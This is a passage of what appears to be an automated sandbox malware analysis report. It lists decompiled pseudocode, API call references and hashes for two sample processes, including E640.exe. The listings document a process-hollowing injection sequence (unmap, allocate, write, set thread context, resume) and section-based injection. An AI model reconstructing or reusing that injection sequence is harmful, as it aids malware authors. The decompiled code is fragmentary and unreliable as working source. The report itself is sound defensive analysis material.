				_t26 = _t10;
				if(_t10 != 0) {
					E00401558(_t14, _t10, _v8, _a16); // executed
				}
				 *_t14(0xffffffff, 0);
				_t12 = 0x1986;
				_push(0x6d);
				_push(0xc5);
				L004011F5(_t19, _t26);
				return _t12;
			}

APIs

Sleep.KERNELBASE(00001388,000000C5,0000006D), ref: 0040198E

Part of subcall function 00401558: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
Part of subcall function 00401558: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644

Memory Dump Source

Source File: 00000004.00000002.634092441.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rfuiwjh.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 3fc1ef90b2a5b2730ee9b434eeb4b582bf46cdcd1d0460405fd1be13f8c58862
Instruction ID: f289286abcb0c8361d5bc883c0512fb430ce21eb2a0d87beead029bdd4c1ea53
Opcode Fuzzy Hash: 3fc1ef90b2a5b2730ee9b434eeb4b582bf46cdcd1d0460405fd1be13f8c58862
Instruction Fuzzy Hash: 6C11C2F1208204F7E7006A959D62E7A3669AB01714F304137BA43790F1D57D9913E76F

Uniqueness

Uniqueness Score: -1.00%

Function 0040193D Relevance: 1.3, APIs: 1, Instructions: 60
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 29%

			E0040193D(void* __eax, signed int __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t14;
				void* _t16;
				intOrPtr* _t18;
				void* _t30;
				signed int _t38;

				_t26 = __edi;
				asm("in eax, 0x45");
				_t2 = __eax - 0x7a;
				 *_t2 =  *(__eax - 0x7a) | __ecx;
				_t38 =  *_t2;
				_push(0x1986);
				_push(0x6d);
				_push(0xc5);
				L004011F5(__edi, _t38);
				_t18 =  *((intOrPtr*)(_t30 + 8));
				Sleep(0x1388);
				_push(_t30 - 4);
				_push( *((intOrPtr*)(_t30 + 0x10)));
				_push( *((intOrPtr*)(_t30 + 0xc)));
				_push(_t18); // executed
				_t14 = L00401467(__edi, __esi); // executed
				_t39 = _t14;
				if(_t14 != 0) {
					E00401558(_t18, _t14,  *((intOrPtr*)(_t30 - 4)),  *((intOrPtr*)(_t30 + 0x14))); // executed
				}
				 *_t18(0xffffffff, 0);
				_t16 = 0x1986;
				_push(0x6d);
				_push(0xc5);
				L004011F5(_t26, _t39);
				return _t16;
			}

APIs

Sleep.KERNELBASE(00001388,000000C5,0000006D), ref: 0040198E

Part of subcall function 00401558: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
Part of subcall function 00401558: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644

Memory Dump Source

Source File: 00000004.00000002.634092441.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rfuiwjh.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 886c6b7d3fd93a1d42f8c5386c1713bd20b837ff01857d39e84b1d41efe43a78
Instruction ID: 515f5f5985279033342f6d13e0d75d2e799464d7355665022411b06cc3c0c42c
Opcode Fuzzy Hash: 886c6b7d3fd93a1d42f8c5386c1713bd20b837ff01857d39e84b1d41efe43a78
Instruction Fuzzy Hash: 991129F2608285EBD7005BA18DA2EA937659F01710F20057BF6037E0F2D53D9513EB1B

Uniqueness

Uniqueness Score: -1.00%

Function 0040196C Relevance: 1.3, APIs: 1, Instructions: 48
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E0040196C(void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t9;
				void* _t11;
				intOrPtr* _t13;
				void* _t23;

				_t19 = __edi;
				_pop(es);
				asm("sbb bh, [eax+ebp*2]");
				_push(0xc5);
				L004011F5(__edi, __eflags);
				_t13 =  *((intOrPtr*)(_t23 + 8));
				Sleep(0x1388);
				_push(_t23 - 4);
				_push( *((intOrPtr*)(_t23 + 0x10)));
				_push( *((intOrPtr*)(_t23 + 0xc)));
				_push(_t13); // executed
				_t9 = L00401467(__edi, __esi); // executed
				_t29 = _t9;
				if(_t9 != 0) {
					E00401558(_t13, _t9,  *((intOrPtr*)(_t23 - 4)),  *((intOrPtr*)(_t23 + 0x14))); // executed
				}
				 *_t13(0xffffffff, 0);
				_t11 = 0x1986;
				_push(0x6d);
				_push(0xc5);
				L004011F5(_t19, _t29);
				return _t11;
			}

APIs

Sleep.KERNELBASE(00001388,000000C5,0000006D), ref: 0040198E

Part of subcall function 00401558: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
Part of subcall function 00401558: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644

Memory Dump Source

Source File: 00000004.00000002.634092441.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rfuiwjh.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 54672eb5d74a33a50b4e0698c103b24abf47bf219929af624bad9b05e038b79e
Instruction ID: 3e47f40c2c79a3419effdd93610d16f961f2ccd470e9348de27537ec9d0296a5
Opcode Fuzzy Hash: 54672eb5d74a33a50b4e0698c103b24abf47bf219929af624bad9b05e038b79e
Instruction Fuzzy Hash: CA01F2B2208244EFCB005BE58CA1EAA3765AB05315F300133F603B90F2C93C8512EB6B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0246092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

., xrefs: 0246095F
l, xrefs: 02460966
GetProcAddress., xrefs: 024609DC, 024609DF, 024609E4

Memory Dump Source

Source File: 00000004.00000002.636285582.0000000002460000.00000040.00001000.00020000.00000000.sdmp, Offset: 02460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2460000_rfuiwjh.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 46cbc01d6fe497aa7e35c932d35fa08e9debb727aa9db7facca804a1f41d1792
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 7F3147B6900609DFDB10CF99C884BAEBBFAFF48324F14514AD841A7350D771EA45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 02460D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.636285582.0000000002460000.00000040.00001000.00020000.00000000.sdmp, Offset: 02460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2460000_rfuiwjh.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 400eb287f5616077c0c63e8a50a6f7dc36a97a230d07dd80a8b7425e118a61ae
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: AF01F272A106008FDF21CF60C908BBF33E5FB86206F0551A6D90B97381E370A8418B82

Uniqueness

Uniqueness Score: -1.00%

Function 0040FEA4 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0040FECA

Part of subcall function 0040FCF6: __fltout2.LIBCMT ref: 0040FD21

__cftog_l.LIBCMT ref: 0040FEF0
__cftoe_l.LIBCMT ref: 0040FF22

Memory Dump Source

Source File: 00000004.00000002.634136698.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_409000_rfuiwjh.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 21dec4cf196e8d3a75056bdaf36ad97ed8be340911ea432b545e5ad1cb732c00
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 00117E3300014EBBCF225E85DC01CEE3F22BB59354F188436FA1869971C73AC9B9AB85

Uniqueness

Uniqueness Score: -1.00%

Function 004097A3 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004097D5

Part of subcall function 00409101: __getptd_noexit.LIBCMT ref: 00409104

__getptd.LIBCMT ref: 004097E3
__getptd.LIBCMT ref: 004097F1
__getptd.LIBCMT ref: 004097FC

Part of subcall function 004098C9: __getptd.LIBCMT ref: 004098D8
Part of subcall function 004098C9: __getptd.LIBCMT ref: 004098E6

Memory Dump Source

Source File: 00000004.00000002.634136698.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_409000_rfuiwjh.jbxd

Similarity

API ID: __getptd$__getptd_noexit
String ID:
API String ID: 989085358-0
Opcode ID: 88ff4ae8ad139f6cf891c398988e30e45730a6c768ec8ce72122bb6a955ccad6
Instruction ID: a3a858591b394101024f9bae808b1775020d1581c8466258f4f8275c37b29c86
Opcode Fuzzy Hash: 88ff4ae8ad139f6cf891c398988e30e45730a6c768ec8ce72122bb6a955ccad6
Instruction Fuzzy Hash: 23110A71D00209EFDB00EFA5D845AAE7BB0FF04318F10846AF814AB292DB7D99159F54

Uniqueness

Uniqueness Score: -1.00%

Function 0040AAD0 Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0040AADC

Part of subcall function 00409101: __getptd_noexit.LIBCMT ref: 00409104

__getptd.LIBCMT ref: 0040AAF3
__lock.LIBCMT ref: 0040AB11
__updatetlocinfoEx_nolock.LIBCMT ref: 0040AB25

Memory Dump Source

Source File: 00000004.00000002.634136698.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_409000_rfuiwjh.jbxd

Similarity

API ID: __getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 1314619503-0
Opcode ID: 07e8029e51f5a19f80c856b6c46ab3295c6cf05eb32ae71829c0fb4d131a8133
Instruction ID: a52b9318068f80dff3845aa1089be6ff0d2d17eda390060aa090471aa132d8b8
Opcode Fuzzy Hash: 07e8029e51f5a19f80c856b6c46ab3295c6cf05eb32ae71829c0fb4d131a8133
Instruction Fuzzy Hash: FEF06232B04710AAE721BB759806B5972A06B00728F11413FF5117B2D2CA7D6961DA5F

Uniqueness

Uniqueness Score: -1.00%

Function 004098C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004098D8

Part of subcall function 00409101: __getptd_noexit.LIBCMT ref: 00409104

__getptd.LIBCMT ref: 004098E6

Strings

csm, xrefs: 004098F4

Memory Dump Source

Source File: 00000004.00000002.634136698.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_409000_rfuiwjh.jbxd

Similarity

API ID: __getptd$__getptd_noexit
String ID: csm
API String ID: 989085358-1018135373
Opcode ID: 2bcf526534d84440a1d74fd0b089d06bbe8278e6a2fb0f241b80fc6935665840
Instruction ID: 589554cbe101abdec6479dd06ff32a3fe8de771eaf826da5da891be04775fa4a
Opcode Fuzzy Hash: 2bcf526534d84440a1d74fd0b089d06bbe8278e6a2fb0f241b80fc6935665840
Instruction Fuzzy Hash: 110178718062059BCF349FA1C4446AEB3B5AF10314F64843FE481BA7E2CB399D90CA18

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: E640.exePID: 7032, Parent PID: 3528COMMON

Execution Graph

Execution Coverage:	2.4%
Dynamic/Decrypted Code Coverage:	85.7%
Signature Coverage:	50%
Total number of Nodes:	42
Total number of Limit Nodes:	8

Executed Functions

Function 04100110 Relevance: 22.7, APIs: 15, Instructions: 248
memorynativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 04100156
GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0410016C
CreateProcessA.KERNELBASE(?,00000000), ref: 04100255
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 04100270
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 04100283
GetThreadContext.KERNELBASE(00000000,?), ref: 0410029F
ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 041002C8
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 041002E3
VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 04100304
NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0410032A
NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 04100399
WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 041003BF
SetThreadContext.KERNELBASE(00000000,?), ref: 041003E1
ResumeThread.KERNELBASE(00000000), ref: 041003ED
ExitProcess.KERNEL32(00000000), ref: 04100412

Memory Dump Source

Source File: 00000005.00000002.634264306.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4100000_E640.jbxd

Yara matches

Similarity

API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
String ID:
API String ID: 2875986403-0
Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction ID: 8e7ef5de527bdf4e7eb8fefefc6a74f4f99f5a360118af150c8bd5fd8cd8fecc
Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction Fuzzy Hash: 95B1C674A00208AFDB44CF98C895F9EBBB5FF88314F248158E909AB391D771AE41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 03FE97C6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 03FE97EE
Module32First.KERNEL32(00000000,00000224), ref: 03FE980E

Memory Dump Source

Source File: 00000005.00000002.633865910.0000000003FE9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FE9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3fe9000_E640.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 4a94030a09656cd1fb1e996f75fb7d1d4c21aa6e5573c3d1672fa0b40a7e769f
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: C0F0F6326003116FE7207FF9AC8CB6FB6ECAF89625F140268E642910C0CBB8E9458671

Uniqueness

Uniqueness Score: -1.00%

Function 04100420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 04100533

Strings

mfoaskdfnoa, xrefs: 04100520, 04100523
0, xrefs: 04100492
d, xrefs: 04100584
saodkfnosa9uin, xrefs: 041004DA

Memory Dump Source

Source File: 00000005.00000002.634264306.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4100000_E640.jbxd

Yara matches

Similarity

API ID: CreateWindow
String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
API String ID: 716092398-2341455598
Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction ID: d9d3190651adfd2379411412fbdc9ed34cd3ee6f89c99823c62f2ea0314f3fbd
Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction Fuzzy Hash: 8A510970D08388DAEB11CB98D849BDDBFB26F16708F144098D5446F2C6C7FAA658CB66

Uniqueness

Uniqueness Score: -1.00%

Function 041005B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(apfHQ), ref: 041005EC

Strings

apfHQ, xrefs: 041005E2, 041005E5
o, xrefs: 04100600

Memory Dump Source

Source File: 00000005.00000002.634264306.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4100000_E640.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID: apfHQ$o
API String ID: 3188754299-2999369273
Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction ID: c23d22d145c34819d085fca602b037a59299021b65d6b26608ed58f815c2c6ec
Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction Fuzzy Hash: 1F011E70C0424CEADB14DB98D5583EEBFB5AF45308F1880D9C4092B282D7B69B59CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 03FE9485 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 03FE94D6

Memory Dump Source

Source File: 00000005.00000002.633865910.0000000003FE9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FE9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3fe9000_E640.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: b7f7f4fcc027c541c5b2fcca09e0fdd324186e0d82e070a785f9f3bd883ac352
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: A7113C79A00208EFDB01DF98C985E99BBF5EF08350F058094F9489B361D375EA90EF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 03FEA71C Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.633865910.0000000003FE9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FE9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3fe9000_E640.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
Instruction ID: 3b11864287fab55aba9179c4415b4a5785a789739275eed7da18f87f05dd1b0f
Opcode Fuzzy Hash: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
Instruction Fuzzy Hash: 0E31653A81A282DFCF15CF74D990AB5FB70EF87224F1996DDC4818B106E326A14BD794

Uniqueness

Uniqueness Score: -1.00%

Function 04123F16 Relevance: 16.8, APIs: 11, Instructions: 258
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 04123F51

Part of subcall function 04125BA8: __getptd_noexit.LIBCMT ref: 04125BA8

__gmtime64_s.LIBCMT ref: 04123FEA
__gmtime64_s.LIBCMT ref: 04124020
__gmtime64_s.LIBCMT ref: 0412403D
__allrem.LIBCMT ref: 04124093
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 041240AF
__allrem.LIBCMT ref: 041240C6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 041240E4
__allrem.LIBCMT ref: 041240FB
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04124119
__invoke_watson.LIBCMT ref: 0412418A

Memory Dump Source

Source File: 00000005.00000002.634264306.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4100000_E640.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction ID: 741c08eaa06648919bbdd2f43ab2ceba81fd80b078e670bd74e38d5cd76854d4
Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction Fuzzy Hash: E071E771A00736ABE7149F79CDC0BAAB7F9BF04329F144279E924E6680E774F9508790

Uniqueness

Uniqueness Score: -1.00%

Function 041284AB Relevance: 16.6, APIs: 11, Instructions: 92
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___crtCorExitProcess.LIBCMT ref: 041284B1
_free.LIBCMT ref: 041284E2
_free.LIBCMT ref: 041284F5
_free.LIBCMT ref: 04128513
_free.LIBCMT ref: 04128525
_free.LIBCMT ref: 04128536
_free.LIBCMT ref: 04128541
_free.LIBCMT ref: 04128565
_free.LIBCMT ref: 04128581
_free.LIBCMT ref: 04128597
_free.LIBCMT ref: 041285BF

Memory Dump Source

Source File: 00000005.00000002.634264306.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4100000_E640.jbxd

Yara matches

Similarity

API ID: _free$ExitProcess___crt
String ID:
API String ID: 1022109855-0
Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
Instruction ID: 46f217d693ad9dc2b332598d2798b78be02a570e74250c7d9107165e917a72c5
Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
Instruction Fuzzy Hash: BA31C0319006B2AFDB21AF14FDC084977A4EB1532430587AAE904D72A0CBB579E9AF90

Uniqueness

Uniqueness Score: -1.00%

Function 0414FC0C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::exception::exception.LIBCMT ref: 0414FC1F
__CxxThrowException@8.LIBCMT ref: 0414FC34
std::exception::exception.LIBCMT ref: 0414FC4D
__CxxThrowException@8.LIBCMT ref: 0414FC62
std::regex_error::regex_error.LIBCPMT ref: 0414FC74

Part of subcall function 0414F914: std::exception::exception.LIBCMT ref: 0414F92E

__CxxThrowException@8.LIBCMT ref: 0414FC82
std::exception::exception.LIBCMT ref: 0414FC9B
__CxxThrowException@8.LIBCMT ref: 0414FCB0

Strings

leM, xrefs: 0414FCA8

Memory Dump Source

Source File: 00000005.00000002.634264306.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4100000_E640.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$std::regex_error::regex_error
String ID: leM
API String ID: 2862078307-2926266777
Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction ID: fe1fd4a226b4a5800926d1c42fb1141468fad47e7c2f4420c0b8bb58b050aea5
Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction Fuzzy Hash: 1A11BC79D0020DBBDF00FFA5D495CDEBB7CAA04244B408966AD1497641EB74B7498B98

Uniqueness

Uniqueness Score: -1.00%

Function 0410F010 Relevance: 15.1, APIs: 10, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 0410F01F

Part of subcall function 04121602: __FF_MSGBANNER.LIBCMT ref: 04121619
Part of subcall function 04121602: __NMSG_WRITE.LIBCMT ref: 04121620

_malloc.LIBCMT ref: 0410F02B
_wprintf.LIBCMT ref: 0410F03E
_free.LIBCMT ref: 0410F044
_free.LIBCMT ref: 0410F065
_malloc.LIBCMT ref: 0410F06D
_sprintf.LIBCMT ref: 0410F0C0
_wprintf.LIBCMT ref: 0410F0D2
_wprintf.LIBCMT ref: 0410F0DC
_free.LIBCMT ref: 0410F0E5

Memory Dump Source

Source File: 00000005.00000002.634264306.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4100000_E640.jbxd

Yara matches

Similarity

API ID: _free_malloc_wprintf$_sprintf
String ID:
API String ID: 3721157643-0
Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
Instruction ID: d00aa34851a4bc8ab111999eb9fce738eea6673cac04151723ea0410e5820fc5
Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
Instruction Fuzzy Hash: AE1127B29005603AE271A6B40D91EFF3AEC9F46705F0400E9FF4CD1180EB987A1593B1

Uniqueness

Uniqueness Score: -1.00%

Function 04111960 Relevance: 13.6, APIs: 9, Instructions: 149
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__CxxThrowException@8.LIBCMT ref: 041119C6
__CxxThrowException@8.LIBCMT ref: 041119F1
__CxxThrowException@8.LIBCMT ref: 04111A1A
__CxxThrowException@8.LIBCMT ref: 04111A4B
_memset.LIBCMT ref: 04111A6A
__CxxThrowException@8.LIBCMT ref: 04111A90
_malloc.LIBCMT ref: 04111AA0
_memset.LIBCMT ref: 04111AAB
_sprintf.LIBCMT ref: 04111ACE

Memory Dump Source

Source File: 00000005.00000002.634264306.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4100000_E640.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset$_malloc_sprintf
String ID:
API String ID: 65388428-0
Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
Instruction ID: a1a9c3f25b456c309c7272d28c00eff86aaf09285d1113834f3b6ba23d62d290
Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
Instruction Fuzzy Hash: DC514A71E40219BAEB10DBA5DD86FEEBBB8FB08744F100125FA05F6190E7746A018BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0410F210 Relevance: 10.7, APIs: 7, Instructions: 165
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__CxxThrowException@8.LIBCMT ref: 0410F284
__CxxThrowException@8.LIBCMT ref: 0410F2AF
__CxxThrowException@8.LIBCMT ref: 0410F2DE
__CxxThrowException@8.LIBCMT ref: 0410F30F
_memset.LIBCMT ref: 0410F32E
__CxxThrowException@8.LIBCMT ref: 0410F354
_sprintf.LIBCMT ref: 0410F373

Memory Dump Source

Source File: 00000005.00000002.634264306.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4100000_E640.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset_sprintf
String ID:
API String ID: 217217746-0
Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction ID: be79d8105c4cb26709cd4e139ad63cb7f97439eb33a84f0cce0ab4963a210ec9
Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction Fuzzy Hash: 7E5161B1E40209BAEF11DFA1DD86FEEBB78EB04704F104165F905B61C0E7B5AA05CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0410F440 Relevance: 10.7, APIs: 7, Instructions: 159COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 0410F4B7
__CxxThrowException@8.LIBCMT ref: 0410F4E2
__CxxThrowException@8.LIBCMT ref: 0410F504
__CxxThrowException@8.LIBCMT ref: 0410F535
_memset.LIBCMT ref: 0410F554
__CxxThrowException@8.LIBCMT ref: 0410F57A
_sprintf.LIBCMT ref: 0410F594

Memory Dump Source

Source File: 00000005.00000002.634264306.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false

